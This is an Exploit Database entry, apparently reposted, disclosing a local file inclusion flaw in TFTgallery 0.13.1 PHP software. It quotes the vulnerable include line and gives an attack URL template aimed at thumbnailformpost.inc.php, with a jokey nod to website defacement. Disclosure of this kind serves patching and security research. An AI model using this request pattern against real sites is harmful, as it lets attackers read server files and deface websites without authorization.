TFTgallery 0.13.1 – Local File Inclusion

• Exploit Database
• 11 阅读

• 作者： Havok
  日期： 2010-10-28
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/15345/

• # TFTgallery <= 0.13.1 Local File Inclusion (LFI)
  # 28/10/2010
  # PHP script available on SourceForge. TFTgallery 0.13 : http://prdownloads.sourceforge.net/tftgallery/tftgallery-0.13.zip
  #TFTgallery 0.13.1 patch : http://www.tftgallery.org/versions/tftgallery-0.13-to-0.13.1.zip
  # By Havok, from France.
  # KAS-D10 à tous les leets. Hey lamers, i hope that it will help you to notify another stupid defacement on Zone-H. Cheers mates!
  # Enj0y!
  # Wanna contact me? h4v0k1337<at>gmail<dot>com
  # 
  ## register_globals=On (Who said "what a useless vulnerability!" =()
  
  "include_once "language/" . $adminlangfile;" (@thumbnailformpost.inc.php (line 3) for the win ;)).
  
  http://www.IM-G0ING-T0-G3T-HACK3D.COM/TFTP-GALLERY-PATH/admin/thumbnailformpost.inc.php?adminlangfile=[LFI]
  
  Maybe some other vulnerabilities, too lazy to check at the moment, sorry =).
  
  <END>